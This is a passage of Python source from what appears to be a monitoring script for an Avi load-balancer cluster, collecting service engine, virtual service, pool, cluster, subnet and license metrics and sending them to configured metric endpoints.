for pm in self.controller_config['pool_stats_config']['pool_metrics_list']:
pm = pm.replace(' ','').lower()
if pm in available_metrics:
if 'pool' in available_metrics[pm]:
pool_server_metrics.append(pm)
else:
for pm in self.pool_server_metric_list:
if pm in available_metrics:
if 'pool' in available_metrics[pm]:
pool_server_metrics.append(pm)
#------
vs_metric_list = ','.join(vs_metrics)
se_metric_list = ','.join(se_metrics)
controller_metric_list = ','.join(controller_metrics)
pool_server_metric_list = ','.join(pool_server_metrics)
return vs_metric_list, se_metric_list, controller_metric_list, pool_server_metric_list
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': remove_version_specific_metrics encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
#----- Add Test functions
#-----------------------------------
def srvc_engn_vs_count(self):
try:
temp_start_time = time.time()
endpoint_payload_list = []
for s in self.se_dict:
if len(self.se_dict[s]['virtualservices']) > 0:
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['se_name'] = self.se_dict[s]['name']
temp_payload['tenant'] = self.se_dict[s]['tenant']
temp_payload['se_group'] = self.se_dict[s]['se_group']
temp_payload['metric_type'] = 'serviceengine_vs_count'
temp_payload['metric_name'] = 'vs_count'
temp_payload['metric_value'] = len(self.se_dict[s]['virtualservices'])
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||serviceengine||%s||vs_count' %self.se_dict[s]['name']
endpoint_payload_list.append(temp_payload)
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func srvc_engn_vs_count completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func srvc_engn_vs_count encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
def srvc_engn_count(self):
try:
temp_start_time = time.time()
se_count = 0
for s in self.se_dict:
if 'name' in self.se_dict[s]:
se_count += 1
endpoint_payload_list = []
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['metric_type'] = 'serviceengine_count'
temp_payload['metric_name'] = 'count'
temp_payload['metric_value'] = se_count
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||serviceengine||count'
endpoint_payload_list.append(temp_payload)
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func srvc_engn_count completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func srvc_engn_count encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
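    #----- Runs srvc_engn_stats once per tenant in its own process, joining in batches
    #----- of 10 to bound the number of concurrent API calls.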
def srvc_engn_stats_threaded(self):
proc = []
for t in self.tenants:
p = Process(target = self.srvc_engn_stats, args = (t['name'],))
p.start()
proc.append(p)
if len(proc) > 9:
for _p in proc:
_p.join()
proc = []
for p in proc:
p.join()
def srvc_engn_stats(self,tenant):
try:
temp_start_time = time.time()
endpoint_payload_list = []
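            #----- Wildcard metrics collection: entity_uuid '*' with step 300 and limit 1
            #----- pulls the latest 5-minute sample of every configured SE metric for all
            #----- service engines in this tenant with a single POST.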
payload = {
"metric_requests": [
{
"step": 300,
"limit": 1,
"aggregate_entity": False,
"entity_uuid": "*",
"se_uuid": "*",
"id": "collItemRequest:AllSEs",
"metric_id": self.se_metric_list
}
]}
se_stat = self.avi_post('analytics/metrics/collection?pad_missing_data=false', tenant, payload).json()
if self.se_realtime == True:
payload = {
"metric_requests": [
{
"step": 5,
"limit": 1,
"aggregate_entity": False,
"entity_uuid": "*",
"se_uuid": "*",
"id": "collItemRequest:AllSEs",
"metric_id": self.se_metric_list
}
]}
realtime_stats = self.avi_post('analytics/metrics/collection?pad_missing_data=false', tenant, payload).json()
for s in se_stat['series']['collItemRequest:AllSEs']:
if s in self.se_dict:
se_name = self.se_dict[s]['name']
_tenant = self.se_dict[s]['tenant']
if tenant == 'admin' or (tenant !='admin' and _tenant != 'admin'):
for entry in se_stat['series']['collItemRequest:AllSEs'][s]:
if 'data' in entry:
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['se_name'] = se_name
temp_payload['cloud'] = self.se_dict[s]['cloud']
temp_payload['tenant'] = self.se_dict[s]['tenant']
temp_payload['se_group'] = self.se_dict[s]['se_group']
temp_payload['metric_type'] = 'serviceengine_metrics'
temp_payload['metric_name'] = entry['header']['name']
temp_payload['metric_value'] = entry['data'][0]['value']
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||serviceengine||%s||%s' %(se_name, entry['header']['name'])
if self.se_realtime == True:
if 'series' in realtime_stats:
if s in realtime_stats['series']['collItemRequest:AllSEs']:
for n in realtime_stats['series']['collItemRequest:AllSEs'][s]:
if n['header']['name'] == entry['header']['name']:
if 'data' in n:
temp_payload['metric_value'] = n['data'][0]['value']
endpoint_payload_list.append(temp_payload)
if len(endpoint_payload_list) > 0:
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func srvc_engn_stats completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func srvc_engn_stats encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
    #--- This function loops through all tenants, pulling the configured metrics
    #--- for all Virtual Services.
def virtual_service_stats_threaded(self):
proc = []
for t in self.tenants:
p = Process(target = self.virtual_service_stats, args = (t['name'],))
p.start()
proc.append(p)
if len(proc) > 9:
for _p in proc:
_p.join()
proc = []
for p in proc:
p.join()
def virtual_service_stats(self,tenant):
try:
temp_start_time = time.time()
#-----
endpoint_payload_list = []
payload = {'metric_requests': [{'step' : 300, 'limit': 1, 'id': 'allvs', 'entity_uuid' : '*', 'metric_id': self.vs_metric_list}]}
vs_stats = self.avi_post('analytics/metrics/collection?pad_missing_data=false', tenant, payload).json()
#----- this pulls 5 sec avg stats for vs that have realtime stats enabled
if self.vs_realtime == True:
payload = {'metric_requests': [{'step' : 5, 'limit': 1, 'id': 'allvs', 'entity_uuid' : '*', 'metric_id': self.vs_metric_list}]}
realtime_stats = self.avi_post('analytics/metrics/collection?pad_missing_data=false', tenant, payload).json()
#-----
for v in vs_stats['series']['allvs']:
if v in self.vs_dict:
vs_uuid = v
vs_name = self.vs_dict[vs_uuid]['name']
_tenant = self.vs_dict[vs_uuid]['tenant']
if tenant == 'admin' or (tenant !='admin' and _tenant != 'admin'):
for m in vs_stats['series']['allvs'][v]:
metric_name = m['header']['name']
if 'data' in m:
                                temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['vs_name'] = vs_name
temp_payload['tenant'] = _tenant
temp_payload['cloud'] = self.vs_dict[vs_uuid]['cloud']
temp_payload['se_group'] = self.vs_dict[vs_uuid]['se_group']
temp_payload['metric_type'] = 'virtualservice_metrics'
temp_payload['metric_name'] = metric_name
temp_payload['metric_value'] = m['data'][0]['value']
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||virtualservice||%s||%s' %(vs_name, metric_name)
if self.vs_realtime == True:
if 'series' in realtime_stats:
if v in realtime_stats['series']['allvs']:
for n in realtime_stats['series']['allvs'][v]:
if n['header']['name'] == m['header']['name']:
if 'data' in n:
temp_payload['metric_value'] = n['data'][0]['value']
endpoint_payload_list.append(temp_payload)
if len(endpoint_payload_list) > 0:
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func virtual_service_stats completed for tenant: '+tenant+', executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func virtual_service_stats encountered an error for tenant '+tenant)
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
def vs_metrics_per_se_threaded(self):
try:
temp_start_time = time.time()
major,minor = self.login.json()['version']['Version'].rsplit('.',1)
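            #----- 'Version' such as '17.2.8' rsplits into major '17.2' and minor '8'; per-SE
            #----- VS metrics are only collected when the check below passes
            #----- (major >= 17.2 with minor >= 8, or major >= 18.1).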
if (float(major) >= 17.2 and float(minor) >= 8) or float(major) >= 18.1:
proc = []
for t in self.tenants:
p = Process(target = self.vs_metrics_per_se, args = (t['name'],))
p.start()
proc.append(p)
if len(proc) > 9:
for _p in proc:
_p.join()
proc = []
for p in proc:
p.join()
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func vs_metrics_per_se_threaded completed, executed in '+temp_total_time+' seconds')
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
def vs_metrics_per_se(self,tenant):
try:
temp_start_time = time.time()
endpoint_payload_list = []
payload = {'metric_requests': [{'step' : 300, 'limit': 1, 'id': 'vs_metrics_by_se', 'entity_uuid' : '*', 'serviceengine_uuid': '*', 'include_refs': True, 'metric_id': self.vs_metric_list}]}
vs_stats = self.avi_post('analytics/metrics/collection?include_name=true&pad_missing_data=false', tenant, payload).json()
#----- this will pull 5 sec stats for vs that have realtime stat enabled
if self.vs_realtime == True:
payload = {'metric_requests': [{'step' : 5, 'limit': 1, 'id': 'vs_metrics_by_se', 'entity_uuid' : '*', 'serviceengine_uuid': '*', 'include_refs': True, 'metric_id': self.vs_metric_list}]}
realtime_stats = self.avi_post('analytics/metrics/collection?include_name=true&pad_missing_data=false', tenant, payload).json()
#------
if len(vs_stats['series']['vs_metrics_by_se']) > 0:
for entry in vs_stats['series']['vs_metrics_by_se']:
if entry in self.vs_dict:
vs_name = self.vs_dict[entry]['name']
_tenant = self.vs_dict[entry]['tenant']
if tenant == 'admin' or (tenant !='admin' and _tenant != 'admin'):
for d in vs_stats['series']['vs_metrics_by_se'][entry]:
if 'data' in d:
if 'serviceengine_ref' in d['header']:
se_name = d['header']['serviceengine_ref'].rsplit('#',1)[1]
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['se_name'] = se_name
temp_payload['tenant'] = self.vs_dict[entry]['tenant']
temp_payload['cloud'] = self.vs_dict[entry]['cloud']
temp_payload['se_group'] = self.vs_dict[entry]['se_group']
temp_payload['vs_name'] = vs_name
temp_payload['metric_type'] = 'virtualservice_metrics_per_serviceengine'
#temp_payload['metric_name'] = d['header']['name']
temp_payload['metric_value'] = d['data'][0]['value']
if self.vs_realtime == True:
if 'series' in realtime_stats:
if entry in realtime_stats['series']['vs_metrics_by_se']:
for n in realtime_stats['series']['vs_metrics_by_se'][entry]:
if n['header']['name'] == d['header']['name'] and n['header']['serviceengine_ref'] == d['header']['serviceengine_ref']:
if 'data' in n:
temp_payload['metric_value'] = n['data'][0]['value']
metric_name = d['header']['name']
temp_payload['metric_name'] = metric_name+'_per_se'
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||serviceengine||%s||virtualservice_stats||%s||%s' %(se_name,vs_name,temp_payload['metric_name'])
endpoint_payload_list.append(temp_payload)
if len(endpoint_payload_list) > 0:
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func vs_metrics_per_se completed tenant: '+tenant+', executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func vs_metrics_per_se for tenant: '+tenant+', encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#----- VS UP/DOWN/Enabled/Disabled STATUS
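    #----- Emits a per-VS oper_status metric (2 = OPER_UP, 1 = OPER_DISABLED, 0 = down)
    #----- plus cluster-wide totals for VS count, up, down and disabled.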
def vs_oper_status(self):
try:
temp_start_time = time.time()
endpoint_payload_list = []
vs_up_count = 0
vs_down_count = 0
vs_disabled_count = 0
vs_count=0
for v in self.vs_dict:
vs_name = self.vs_dict[v]['name']
vs_count += 1
metric_name = 'oper_status'
if self.vs_dict[v]['results']['runtime']['oper_status']['state'] == 'OPER_UP':
metric_value = 2
vs_up_count += 1
elif self.vs_dict[v]['results']['runtime']['oper_status']['state'] == 'OPER_DISABLED':
metric_value = 1
vs_disabled_count += 1
else:
metric_value = 0
vs_down_count += 1
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['vs_name'] = vs_name
temp_payload['tenant'] = self.vs_dict[v]['tenant']
temp_payload['cloud'] = self.vs_dict[v]['cloud']
temp_payload['se_group'] = self.vs_dict[v]['se_group']
temp_payload['metric_type'] = 'virtualservice_operstatus'
temp_payload['metric_name'] = 'oper_status'
temp_payload['metric_value'] = metric_value
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||virtualservice||%s||%s' %(vs_name, metric_name)
endpoint_payload_list.append(temp_payload)
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
#----- Total VS
a = temp_payload.copy()
a['metric_name'] = 'count'
a['metric_value'] = vs_count
a['metric_type'] = 'virtualservice_count'
a['name_space'] = 'avi||'+self.avi_cluster_name+'||virtualservice||count'
endpoint_payload_list.append(a)
#----- Total VS UP
b = temp_payload.copy()
b['metric_type'] = 'virtualservice_up'
b['metric_name'] = 'status_up'
b['metric_value'] = vs_up_count
b['name_space'] = 'avi||'+self.avi_cluster_name+'||virtualservice||status_up'
endpoint_payload_list.append(b)
#----- Total VS Down
c = temp_payload.copy()
c['metric_type'] = 'virtualservice_down'
c['metric_name'] = 'status_down'
c['metric_value'] = vs_down_count
c['name_space'] = 'avi||'+self.avi_cluster_name+'||virtualservice||status_down'
endpoint_payload_list.append(c)
#----- Total VS Disabled
d = temp_payload.copy()
d['metric_type'] = 'virtualservice_disabled'
d['metric_name'] = 'status_disabled'
d['metric_value'] = vs_disabled_count
d['name_space'] = 'avi||'+self.avi_cluster_name+'||virtualservice||status_disabled'
endpoint_payload_list.append(d)
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func vs_oper_status completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func vs_oper_status encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
#----- RETRIEVE THE NUMBER OF ENABLED, ACTIVE, AND TOTAL POOL MEMBERS FOR EACH VIRTUAL SERVER
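    #----- For every pool that reports runtime server counts, emits pool_members_enabled,
    #----- pool_members_up and pool_members (configured) once per associated virtual service.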
def active_pool_members(self):
try:
temp_start_time = time.time()
endpoint_payload_list = []
for pool in self.pool_dict:
p = self.pool_dict[pool]['results']
try:
vs_list = []
if 'num_servers' in p['runtime']:
if 'virtualservice' in p:
vs_list.append(p['virtualservice']['name'])
elif 'virtualservices' in p:
for v in p['virtualservices']:
vs_list.append(v.rsplit('#',1)[1])
pool_name = p['config']['name']
pool_members_up = p['runtime']['num_servers_up']
pool_members_enabled = p['runtime']['num_servers_enabled']
pool_members = p['runtime']['num_servers']
for vs_entry in vs_list:
#----- pool members enabled
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['vs_name'] = vs_entry
temp_payload['tenant'] = self.pool_dict[p['config']['uuid']]['tenant']
temp_payload['cloud'] = self.pool_dict[p['config']['uuid']]['cloud']
temp_payload['pool_name'] = pool_name
temp_payload['metric_type'] = 'virtualservice_pool_members'
temp_payload['metric_name'] = 'virtualservice_pool_members_enabled'
temp_payload['metric_value'] = pool_members_enabled
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||virtualservice||%s||pool||%s||%s' %(vs_entry, pool_name, 'pool_members_enabled')
endpoint_payload_list.append(temp_payload)
#----- pool members up
temp1_payload = self.payload_template.copy()
temp1_payload['timestamp']=int(time.time())
temp1_payload['vs_name'] = vs_entry
temp1_payload['tenant'] = self.pool_dict[p['config']['uuid']]['tenant']
temp1_payload['cloud'] = self.pool_dict[p['config']['uuid']]['cloud']
temp1_payload['pool_name'] = pool_name
temp1_payload['metric_type'] = 'virtualservice_pool_members'
temp1_payload['metric_name'] = 'virtualservice_pool_members_up'
temp1_payload['metric_value'] = pool_members_up
temp1_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||virtualservice||%s||pool||%s||%s' %(vs_entry, pool_name, 'pool_members_up')
endpoint_payload_list.append(temp1_payload)
#----- pool members configured
temp2_payload = self.payload_template.copy()
temp2_payload['timestamp']=int(time.time())
temp2_payload['vs_name'] = vs_entry
temp2_payload['tenant'] = self.pool_dict[p['config']['uuid']]['tenant']
temp2_payload['cloud'] = self.pool_dict[p['config']['uuid']]['cloud']
temp2_payload['pool_name'] = pool_name
temp2_payload['metric_type'] = 'virtualservice_pool_members'
temp2_payload['metric_name'] = 'virtualservice_pool_members'
temp2_payload['metric_value'] = pool_members
temp2_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||virtualservice||%s||pool||%s||%s' %(vs_entry, pool_name, 'pool_members')
endpoint_payload_list.append(temp2_payload)
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
if len(endpoint_payload_list) > 0:
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func active_pool_members completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func active_pool_members encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
#----- SE missed heartbeats
def se_missed_hb(self):
try:
temp_start_time = time.time()
endpoint_payload_list = []
discovered_se = []
for s in self.se_dict:
if s not in discovered_se:
discovered_se.append(s)
if 'hb_status' in self.se_dict[s]['results']['runtime']:
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['se_name'] = self.se_dict[s]['name']
temp_payload['tenant'] = self.se_dict[s]['tenant']
temp_payload['cloud'] = self.se_dict[s]['cloud']
temp_payload['se_group'] = self.se_dict[s]['se_group']
temp_payload['metric_type'] = 'serviceengine_missed_heartbeats'
temp_payload['metric_name'] = 'missed_heartbeats'
temp_payload['metric_value'] = self.se_dict[s]['results']['runtime']['hb_status']['num_hb_misses']
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||serviceengine||%s||%s' %(self.se_dict[s]['name'], 'missed_heartbeats')
endpoint_payload_list.append(temp_payload)
if len(endpoint_payload_list) > 0:
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func se_missed_hb completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func se_missed_hb encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
#----- SE Connected State
def se_connected(self):
try:
temp_start_time = time.time()
endpoint_payload_list = []
discovered_se = []
for s in self.se_dict:
if s not in discovered_se:
discovered_se.append(s)
if 'se_connected' in self.se_dict[s]['results']['runtime']:
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['se_name'] = self.se_dict[s]['name']
temp_payload['tenant'] = self.se_dict[s]['tenant']
temp_payload['cloud'] = self.se_dict[s]['cloud']
temp_payload['se_group'] = self.se_dict[s]['se_group']
temp_payload['metric_type'] = 'serviceengine_connected_state'
temp_payload['metric_name'] = 'connected'
if self.se_dict[s]['results']['runtime']['se_connected'] == True:
temp_payload['metric_value'] = 1
else:
temp_payload['metric_value'] = 0
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||serviceengine||%s||%s' %(self.se_dict[s]['name'], 'connected_state')
endpoint_payload_list.append(temp_payload)
if len(endpoint_payload_list) > 0:
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func se_connected completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func se_connected encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
def cluster_status(self):
try:
temp_start_time = time.time()
cluster_status = self.avi_request('cluster/runtime','admin').json()
endpoint_payload_list = []
active_members = 0
#-----------------------------------
#---- RETURN CLUSTER MEMBER ROLE
#---- follower = 0, leader = 1
for c in cluster_status['node_states']:
if c['state'] == 'CLUSTER_ACTIVE':
active_members = active_members + 1
if c['role'] == 'CLUSTER_FOLLOWER':
member_role = 0
elif c['role'] == 'CLUSTER_LEADER':
member_role = 1
try:
member_name = socket.gethostbyaddr(c['name'])[0]
except:
member_name = c['name']
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['cluster_name'] = member_name
temp_payload['metric_type'] = 'cluster'
temp_payload['metric_name'] = 'member_role'
temp_payload['metric_value'] = member_role
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||cluster||%s||role' %member_name
endpoint_payload_list.append(temp_payload)
#-----------------------------------
#---- ADD ACTIVE MEMBER COUNT TO LIST
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['metric_type'] = 'cluster'
temp_payload['metric_name'] = 'active_members'
temp_payload['metric_value'] = active_members
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||cluster||active_members'
endpoint_payload_list.append(temp_payload)
#----- Send metrics
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func cluster_status completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func cluster_status encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
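    #----- Reports the percentage of used IPs for each network that has an address pool,
    #----- based on used_ip_count / total_ip_count from network-inventory; only runs on
    #----- minutes divisible by 5.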
def avi_subnet_usage(self):
try:
if datetime.now().minute % 5 == 0: #----- run every 5 mins
temp_start_time = time.time()
subnets = self.avi_request('network-inventory?page_size=200','admin').json()['results']
endpoint_payload_list = []
if len(subnets) > 0:
for s in subnets:
if 'subnet_runtime' in s['runtime'].keys():
pool_size = float(s['runtime']['subnet_runtime'][0]['total_ip_count'])
if pool_size > 0:
network_name = s['runtime']['name'].replace('|','_').replace(':','_')
pool_used = float(s['runtime']['subnet_runtime'][0]['used_ip_count'])
percentage_used = int((pool_used/pool_size)*100)
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['network_name'] = network_name
temp_payload['metric_type'] = 'network_usage'
temp_payload['metric_name'] = 'used'
temp_payload['metric_value'] = percentage_used
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||networks||%s||used' %network_name
endpoint_payload_list.append(temp_payload)
if len(endpoint_payload_list) > 0:
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func avi_subnet_usage completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func avi_subnet_usage encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
def virtual_service_hosted_se(self):
try:
temp_start_time = time.time()
endpoint_payload_list = []
discovered = []
for v in self.vs_dict:
if 'service_engine' in self.vs_dict[v]['results']['runtime']['vip_summary'][0]:
vs_name = self.vs_dict[v]['name']
for r in self.vs_dict[v]['results']['runtime']['vip_summary']:
for s in r['service_engine']:
se_name = s['url'].rsplit('#',1)[1]
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['se_name'] = se_name
temp_payload['vs_name'] = vs_name
temp_payload['tenant'] = self.vs_dict[v]['tenant']
temp_payload['cloud'] = self.vs_dict[v]['cloud']
temp_payload['se_group'] = self.vs_dict[v]['se_group']
temp_payload['metric_type'] = 'virtualservice_hosted_se'
temp_payload['metric_name'] = 'hosting_se'
temp_payload['metric_value'] = 1
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||virtualservice||%s||serviceengine||%s' %(vs_name, se_name)
if temp_payload not in discovered:
discovered.append(temp_payload)
endpoint_payload_list.append(temp_payload)
if len(endpoint_payload_list) > 0:
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func virtual_service_hosted_se completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func virtual_service_hosted_se encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
def vs_primary_se(self):
try:
temp_start_time = time.time()
discovered_vs = []
endpoint_payload_list = []
for v in self.vs_dict:
if v not in discovered_vs:
for a in self.vs_dict[v]['results']['runtime']['vip_summary']:
if 'service_engine' in a:
for s in a['service_engine']:
if s['primary'] == True:
discovered_vs.append(v)
se_name = s['url'].rsplit('#',1)[1]
vs_name = self.vs_dict[v]['name']
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['vs_name'] = vs_name
temp_payload['tenant'] = self.vs_dict[v]['tenant']
temp_payload['cloud'] = self.vs_dict[v]['cloud']
temp_payload['se_group'] = self.vs_dict[v]['se_group']
temp_payload['se_name'] = se_name
temp_payload['metric_type'] = 'virtualservice_primary_se'
temp_payload['metric_name'] = 'primary_se'
temp_payload['metric_value'] = 1
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||virtualservice||%s||primary_se||%s' %(vs_name,se_name)
endpoint_payload_list.append(temp_payload)
if len(endpoint_payload_list) > 0:
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
            print(str(datetime.now())+' '+self.avi_cluster_ip+': func vs_primary_se completed, executed in '+temp_total_time+' seconds')
except:
            print(str(datetime.now())+' '+self.avi_cluster_ip+': func vs_primary_se encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
def license_usage(self):
try:
temp_start_time = time.time()
endpoint_payload_list = []
licensing = self.avi_request('licenseusage?limit=1&step=300','admin').json()
lic_cores = licensing['licensed_cores']
if lic_cores != None:
cores_used = licensing['num_se_vcpus']
percentage_used = (cores_used / float(lic_cores))*100
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['metric_type'] = 'licensing'
temp_payload['metric_name'] = 'licensed_cores'
temp_payload['metric_value'] = lic_cores
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||licensing||licensed_cores'
endpoint_payload_list.append(temp_payload)
#-----
temp1_payload = self.payload_template.copy()
temp1_payload['timestamp']=int(time.time())
temp1_payload['metric_type'] = 'licensing'
temp1_payload['metric_name'] = 'cores_used'
temp1_payload['metric_value'] = cores_used
temp1_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||licensing||cores_used'
endpoint_payload_list.append(temp1_payload)
#-----
temp2_payload = self.payload_template.copy()
temp2_payload['timestamp']=int(time.time())
temp2_payload['metric_type'] = 'licensing'
temp2_payload['metric_name'] = 'percentage_used'
temp2_payload['metric_value'] = percentage_used
temp2_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||licensing||percentage_used'
endpoint_payload_list.append(temp2_payload)
temp_total_time = str(time.time()-temp_start_time)
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func license_usage completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func license_usage encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
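    #----- Computes, per SE, the percentage of the SE group's max_vs_per_se limit that is
    #----- currently consumed by placed virtual services.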
def service_engine_vs_capacity(self):
try:
temp_start_time = time.time()
endpoint_payload_list = []
discovered_vs = []
se_vs = {}
for s in self.se_dict:
se_name = self.se_dict[s]['name']
if se_name not in se_vs:
seg = self.se_dict[s]['results']['se_group_ref'].rsplit('#',1)[0].split('/api/serviceenginegroup/')[1]
max_vs = self.seg_dict[seg]['max_vs_per_se']
se_vs[se_name]={'max_vs': max_vs, 'total_vs': 0,'tenant': self.se_dict[s]['tenant']}
se_vs[se_name]['se_group'] = self.se_dict[s]['se_group']
se_vs[se_name]['cloud'] = self.se_dict[s]['cloud']
if 'vs_refs' in self.se_dict[s]['results']:
for v in self.se_dict[s]['results']['vs_refs']:
if se_name+v.rsplit('api/virtualservice/')[1].rsplit('#',1)[0] not in discovered_vs:
discovered_vs.append(se_name+v.rsplit('api/virtualservice/')[1].rsplit('#',1)[0])
se_vs[se_name]['total_vs'] += 1
for entry in se_vs:
vs_percentage_used = (se_vs[entry]['total_vs']/se_vs[entry]['max_vs'])*100
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
